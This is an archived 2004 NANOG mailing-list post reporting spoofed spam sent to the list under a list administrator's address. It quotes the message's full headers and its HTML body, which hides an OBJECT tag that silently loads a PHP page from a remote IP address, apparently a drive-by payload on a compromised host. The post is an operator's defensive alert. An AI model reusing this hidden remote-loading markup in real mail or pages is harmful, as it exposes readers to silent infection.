[68871] in North American Network Operators' Group
now what - spam to nanog spoofing susan harris?
daemon@ATHENA.MIT.EDU (Suresh Ramasubramanian)
Wed Mar 17 21:50:05 2004
Date: Thu, 18 Mar 2004 08:18:59 +0530
From: Suresh Ramasubramanian <suresh@outblaze.com>
To: NANOG <nanog@merit.edu>, Susan Harris <srh@merit.edu>
Errors-To: owner-nanog-outgoing@merit.edu
Mailed out through an open proxy / hacked machine in some australian
museum, with a body that tries to load this html page -
http://24.84.218.164:81/641280.php
Page is hosted on a shawcable conection (probably another trojaned box)
that I can't seem to access, though the host is barely pingable
srs
> Return-Path: <owner-nanog@merit.edu>
> Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26])
> by corpmail.outblaze.com (Postfix) with ESMTP
> id B199316DD9F; Thu, 18 Mar 2004 02:43:17 +0000 (GMT)
> Received: by trapdoor.merit.edu (Postfix)
> id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
> Received: by trapdoor.merit.edu (Postfix, from userid 56)
> id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
> Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
> by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F
> for <nanog@trapdoor.merit.edu>; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
> Received: by segue.merit.edu (Postfix)
> id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
> Received: from PH02887.net (unknown [203.18.63.43])
> by segue.merit.edu (Postfix) with SMTP id 8220D5DE34
> for <nanog@merit.edu>; Wed, 17 Mar 2004 21:40:43 -0500 (EST)
> Delivered-To: nanog-outgoing@trapdoor.merit.edu
> Delivered-To: nanog@trapdoor.merit.edu
> Delivered-To: nanog@merit.edu
> Date: Thu, 18 Mar 2004 13:40:35 +1000
> To: nanog@merit.edu
> Subject: Request response
> From: srh@merit.edu
> Message-ID: <xpvmqgksfnpfrcuagqc@merit.edu>
> MIME-Version: 1.0
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-Mailer: Microsoft Outlook Express 6.00.2600.0000
> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
> Content-Type: text/html; charset=us-ascii
> Content-Transfer-Encoding: 7bit
> Sender: owner-nanog@merit.edu
> Precedence: bulk
> Errors-To: owner-nanog-outgoing@merit.edu
> X-Loop: nanog
> X-AntiVirus: checked by Vexira MailArmor (version: 2.0.1.11; VAE: 6.24.0.7; VDF: 6.24.0.61; host: corpmail.outblaze.com)
>
>
> <html><body>
> <font face="System">
> <OBJECT STYLE="display:none" DATA="http://24.84.218.164:81/641280.php">
> </OBJECT></body></html>
